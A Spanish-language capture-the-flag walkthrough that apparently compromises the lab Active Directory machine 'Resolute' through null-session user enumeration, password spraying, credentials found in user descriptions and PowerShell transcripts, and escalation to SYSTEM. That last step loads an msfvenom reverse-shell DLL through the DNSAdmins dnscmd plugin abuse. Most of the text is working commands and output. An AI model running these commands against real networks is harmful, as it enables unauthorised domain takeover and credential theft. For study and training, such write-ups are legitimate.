Enumeración
Iniciamos la máquina escaneando los puertos de la máquina con nmap donde encontramos varios puertos de AD abiertos entre ellos smb, kerberos y otros
❯ nmap 10.10.10.169
Nmap scan report for 10.10.10.169
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
49677/tcp open unknown
49686/tcp open unknown
49743/tcp open unknown
Con crackmapexec podemos obtener información de la maquina asi como el dominio que es megabank.local ademas del nombre que parece es resolute
❯ crackmapexec smb 10.10.10.169
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
Para posibles proximos ataques o solo por comodidad agregaremos el dominio al /etc/hosts ademas el nombre de la máquina que es el DC como otro dominio
❯ echo "10.10.10.169 megabank.local resolute.megabank.local" | sudo tee -a /etc/hosts
Al conectarnos con rpcclient como usuario nulo nos permite enumerar usuarios
❯ rpcclient -N -U '' megabank.local
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
rpcclient $>
Ejecutando enumdomusers y aplicando algunas expresiones regulares al output de rpcclient podemos generar un diccionario con todos los usuarios del dominio
❯ rpcclient -N -U '' megabank.local -c enumdomusers | grep -oP '\[\D*?\]' | tr -d '[]' | tee users.txt
Administrator
Guest
krbtgt
DefaultAccount
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
Probando un ASREPRoast para cada uno de ellos vemos que ninguno es vulnerable
❯ impacket-GetNPUsers megabank.local/ -no-pass -usersfile users.txt
Impacket v0.11.0 - Copyright 2023 Fortra
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User ryan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marko doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User angela doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User felicia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gustavo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ulf doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User stevie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claire doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paulo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User steve doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annette doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annika doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User per doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claude doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User melanie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User zach doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User simon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User naoki doesn't have UF_DONT_REQUIRE_PREAUTH set
Con queryuser podemos ver información de los usuarios, como la descripción
rpcclient $> queryuser Administrator
User Name : Administrator
Full Name :
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Built-in account for administering the computer/domain
Workstations:
Comment :
Remote Dial :
Logon Time : jue, 29 jun 2023 20:13:56 EDT
Logoff Time : mié, 31 dic 1969 19:00:00 EST
Kickoff Time : mié, 31 dic 1969 19:00:00 EST
Password last set Time : jue, 29 jun 2023 20:23:03 EDT
Password can change Time : vie, 30 jun 2023 20:23:03 EDT
Password must change Time: mié, 13 sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0x1f4
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x00000059
padding1[0..7]...
logon_hrs[0..21]...
rpcclient $>
Shell - melanie
Iterando sobre cada uno de los usuarios podemos ver su descripción, en este caso en la de marko encontramos una contraseña en texto plano de una nueva cuenta
❯ for user in $(cat users.txt); do rpcclient -N -U "" megabank.local -c "queryuser $user"; done | grep -E "User Name|Description"
User Name : Administrator
Description : Built-in account for administering the computer/domain
User Name : Guest
Description : Built-in account for guest access to the computer/domain
User Name : krbtgt
Description : Key Distribution Center Service Account
User Name : DefaultAccount
Description : A user account managed by the system.
User Name : ryan
Description :
User Name : marko
Description : Account created. Password set to Welcome123!
User Name : sunita
Description :
User Name : abigail
Description :
User Name : marcus
Description :
..................................................................................
Podemos aplicar un passwordspray para probar la contraseña de la descripción para toda la lista de usuarios, el usuario melanie devuelve que esta es valida
❯ crackmapexec smb megabank.local -u users.txt -p Welcome123! --continue-on-success
SMB megabank.local 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB megabank.local 445 RESOLUTE [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB megabank.local 445 RESOLUTE [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE
Aunque ahora tenemos una credencial valida no nos otorga ningun privilegio especial entre los recursos SMB, excepto un par de READ en recursos por defecto
❯ crackmapexec smb megabank.local -u melanie -p Welcome123! --shares
SMB megabank.local 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB megabank.local 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB megabank.local 445 RESOLUTE [+] Enumerated shares
SMB megabank.local 445 RESOLUTE Share Permissions Remark
SMB megabank.local 445 RESOLUTE ----- ----------- ------
SMB megabank.local 445 RESOLUTE ADMIN$ Remote Admin
SMB megabank.local 445 RESOLUTE C$ Default share
SMB megabank.local 445 RESOLUTE IPC$ Remote IPC
SMB megabank.local 445 RESOLUTE NETLOGON READ Logon server share
SMB megabank.local 445 RESOLUTE SYSVOL READ Logon server share
Al probarlas en el protocolo winrm nos devuelve Pwn3d! lo que quiere decir que estas credenciales son validas para el winrm por lo que podemos obtener una shell
❯ crackmapexec winrm megabank.local -u melanie -p Welcome123!
SMB megabank.local 5985 RESOLUTE [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:megabank.local)
HTTP megabank.local 5985 RESOLUTE [*] http://megabank.local:5985/wsman
WINRM megabank.local 5985 RESOLUTE [+] megabank.local\melanie:Welcome123! (Pwn3d!)
Usando evil-winrm podemos conectarnos y obtener una powershell como melanie
❯ evil-winrm -i megabank.local -u melanie -p Welcome123!
PS C:\Users\melanie\Documents> whoami
megabank\melanie
PS C:\Users\melanie\Documents> type ..\Desktop\user.txt
070**************************79f
PS C:\Users\melanie\Documents>
Shell - ryan
Al listar de primeras el directorio C:\ no encontramos nada interesante, sin embargo al usar -force podemos ver un directorio PSTranscripts que estaba oculto
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
PS C:\> dir -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 6/29/2023 5:12 PM 402653184 pagefile.sys
PS C:\>
en el encontramos otro directorio llamado 20191203 el cual tiene dentro un .txt
PS C:\> cd PSTranscripts
PS C:\PSTranscripts> dir -force
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
PS C:\PSTranscripts> cd 20191203
PS C:\PSTranscripts\20191203> dir -force
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
PS C:\PSTranscripts\20191203>
Este contiene la información de varios comandos, entre ellos llama la atención un comando net use donde se autentica como el usuario ryan contra un recurso smb
PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
........................................................................................................................
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
........................................................................................................................
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
PS C:\PSTranscripts\20191203>
Estas credenciales al probarlas con SMB nos devuelven un Pwn3d! sin embargo este usuario no tiene privilegios de escritura que es WRITE en ningun recurso SMB
❯ crackmapexec smb megabank.local -u ryan -p Serv3r4Admin4cc123!
SMB megabank.local 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB megabank.local 445 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
❯ crackmapexec smb megabank.local -u ryan -p Serv3r4Admin4cc123! --shares
SMB megabank.local 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB megabank.local 445 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
SMB megabank.local 445 RESOLUTE [+] Enumerated shares
SMB megabank.local 445 RESOLUTE Share Permissions Remark
SMB megabank.local 445 RESOLUTE ----- ----------- ------
SMB megabank.local 445 RESOLUTE ADMIN$ Remote Admin
SMB megabank.local 445 RESOLUTE C$ Default share
SMB megabank.local 445 RESOLUTE IPC$ Remote IPC
SMB megabank.local 445 RESOLUTE NETLOGON READ Logon server share
SMB megabank.local 445 RESOLUTE SYSVOL READ Logon server share
Al probar estas credenciales hacia winrm nuevamente nos devuelve que son validas
❯ crackmapexec winrm megabank.local -u ryan -p Serv3r4Admin4cc123!
SMB megabank.local 5985 RESOLUTE [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:megabank.local)
HTTP megabank.local 5985 RESOLUTE [*] http://megabank.local:5985/wsman
WINRM megabank.local 5985 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
Podemos conectarnos usando evil-winrm y conseguir una powershell como ryan
❯ evil-winrm -i megabank.local -u ryan -p Serv3r4Admin4cc123!
PS C:\Users\ryan\Documents> whoami
megabank\ryan
PS C:\Users\ryan\Documents>
Shell - Administrator
Después de enumerar el dominio y subir la información recolectada a bloodhound podemos encontrar que el usuario ryan forma parte del grupo DNSAdmins
En lolbas encontramos una forma para mediante dnscmd cargar un dll al iniciar el servicio, iniciamos creando un dll malicioso y compartiendolo con un recurso smb
❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f dll -o shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dll
❯ impacket-smbserver kali . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Iniciamos configurando con dnscmd para el arranque del servicio dns, para que este cargue el dll malicioso que creamos antes de nuestro recurso smb al iniciarse
PS C:\Users\ryan\Documents> dnscmd /config /serverlevelplugindll \\10.10.14.10\kali\shell.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
PS C:\Users\ryan\Documents>
Ahora simplemente nos queda dentener e iniciar el servicio dns usando sc.exe
PS C:\Users\ryan\Documents> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PS C:\Users\ryan\Documents> sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 3932
FLAGS :
PS C:\Users\ryan\Documents>
Al volver a iniciar el servicio este realiza una petición como la maquina RESOLUTE$ a nuestra maquina, y al cargar el dll malicioso nos envia una reverse shell
❯ impacket-smbserver kali . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,50763)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:6a5f93f3e287203626c14e32c63b50a5:010100000000000080e22c24eeaad901ac96772e9f34a36a00000000010010005a006c004f0071006b006c0068006700030010005a006c004f0071006b006c0068006700020010004d0042007600490047006e007a005a00040010004d0042007600490047006e007a005a000700080080e22c24eeaad901060004000200000008003000300000000000000000000000004000006c14702b8a0a5bcb8a5cb0083ee71d6f249b57c4dd8542761efb111e279d89350a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100350035000000000000000000
[*] Connecting Share(1:kali)
[*] Disconnecting Share(1:kali)
[*] Closing down connection (10.10.10.169,50763)
[*] Remaining connections []
La shell que recibimos es como el usuario nt authority\system que tiene maximos privilegios sobre el equipo por lo que ahora podemos leer la flag de Administrator
❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.10.10.169
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
004**************************5a8
C:\Windows\system32>
